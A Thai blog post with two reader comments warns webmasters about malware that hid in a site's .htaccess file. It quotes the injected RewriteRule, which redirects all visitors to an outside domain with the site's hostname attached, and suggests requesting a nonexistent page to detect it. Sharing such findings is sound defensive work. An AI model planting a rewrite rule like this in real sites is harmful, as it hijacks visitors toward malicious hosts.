เมื่อวานเว็บที่ผมดูแลอยู่ โดนแอนตี้ไวรัสในเครื่องแจ้งว่า มีมอลแวร์ฝังตัวอยู่ ผมหาอยู่นาน ปาเข้าไปเกือบสองวัน ปกติมอลแวร์มันมักจะเขียนคำสั่งลงไปในไฟล์ php หรือไม่งั้นมันก็เขียนลงไปในไฟล์ javascript คราวนี้ไม่ พวกเล่นเขียนลงไปในไฟล์ .htaccess เลย
RewriteRule .* http://ns1.buckcreekcamp.org/main.php?h=%{HTTP_HOST}&i=JcypjNYcqvyniRjzUsROyZEZ&e=r [R,L] |
จึงมาเตือนๆกันไว้ เดี๋ยวจะเสียเวลาหากันพักใหญ่
ดูมันทำ !!!
วิธีตรวจสอบ ให้ท่านลองเรียกเพจที่ไม่มีอยู่จริง ถ้าหากมันยังฟ้องว่าติดมัลแวร์อยู่ ก็แสดงว่าติดอยู่ที่ .htaccess แล้วล่ะครับ
วัชรเมธน์ ชิษณุคุปต์ ศรีเนธิโรทัย
Programmer, Blogger
ชีวิตมันคือการเดินทางเพื่อค้นหาอะไรบางอย่าง และเพื่อค้นพบอะไรบางอย่าง สิ่งที่รู้แล้วจะได้บอกกล่าวให้คนข้างหลังได้ฟัง เพื่อเดินลุยเข้าไปในพงหนามอย่างเตรียมใจไว้แล้วว่าอาจจะต้องเจ็บ
minddezign says:
01/06/2553 at 01/06/2553
เหอๆ เมื่อก่อนก็เจอมาพักนึงครับ หาตั้งนาน แสบจริงๆครับ
อยากรู้ says:
08/06/2553 at 08/06/2553
แบบนี้จะป้องกัน .htaccess โดยใช้ chmod แบบไหนได้บ้างครับ
ขอบคุณครับ